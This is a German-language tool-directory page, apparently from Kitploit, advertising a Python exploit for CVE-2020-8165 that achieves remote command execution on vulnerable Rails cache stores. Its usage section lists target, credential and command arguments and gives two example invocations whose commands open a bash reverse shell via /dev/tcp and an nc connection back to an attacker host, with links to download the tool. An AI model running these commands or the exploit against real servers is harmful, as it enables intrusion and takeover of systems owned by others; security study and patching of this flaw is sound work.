Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2020-8165 — Python-Exploit für CVE-2020-8165, der auf Rails MemCacheStore und RedisCacheStore abzielt. Ermöglicht Remote-Befehlsausführung durch benutzerbereitgestelltes Object Unmarshalling mit argparse-basierter Schnittstelle. | Kitploit
Tools/GitHubGitHub/hybryx/cve-2020-8165
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHubhybryx/cve-2020-8165

CVE-2020-8165

Python-Exploit für CVE-2020-8165, der auf Rails MemCacheStore und RedisCacheStore abzielt. Ermöglicht Remote-Befehlsausführung durch benutzerbereitgestelltes Object Unmarshalling mit argparse-basierter Schnittstelle.

Repository anzeigen
4vor 5 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2020-8165 Python-Exploit

Dies ist ein Code zum Ausnutzen von CVE-2020-8165 mittels Python3. Dieser Exploit funktioniert mit Rails < 5.2.4.3, Rails < 6.0.3.1. Der Exploit ermöglicht es einem Angreifer, benutzerbereitgestellte Objekte in MemCacheStore und RedisCacheStore zu unmarshallen. Dieser Exploit-Code verwendet ArgParse, um dem Benutzer die sehr einfache Ausnutzung dieser Sicherheitslücke zu ermöglichen.

Verwendung

Es gibt fünf Argumente für diesen Exploit:

  • rHost - Die IP-Adresse des entfernten Ziel-Hosts
  • rPort - Die Portnummer des entfernten Ziel-Hosts, auf dem Rails läuft
  • email - Die E-Mail, die zum Einloggen in den Dienst verwendet wird
  • password - Das Passwort für das Konto, um sich beim Dienst anzumelden
  • cmd - Der auszuführende Befehl, in Anführungszeichen, um Leerzeichen zu berücksichtigen

Beispiele:

  • python3 exploit.py 10.10.10.X 8080 [email protected] password "bash -c 'bash -i >& /dev/tcp/10.10.X.X/8989 0>&1'"
  • python3 exploit.py 10.10.10.X 8080 [email protected] password "nc 10.10.X.X 8989"

Wesentliche Quellen

Original CVE-Details: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8165 Pastebin-Exploit-Code, den ich überarbeitet und ArgParse hinzugefügt habe: https://pastebin.com/jpHpdBTk

Tool herunterladen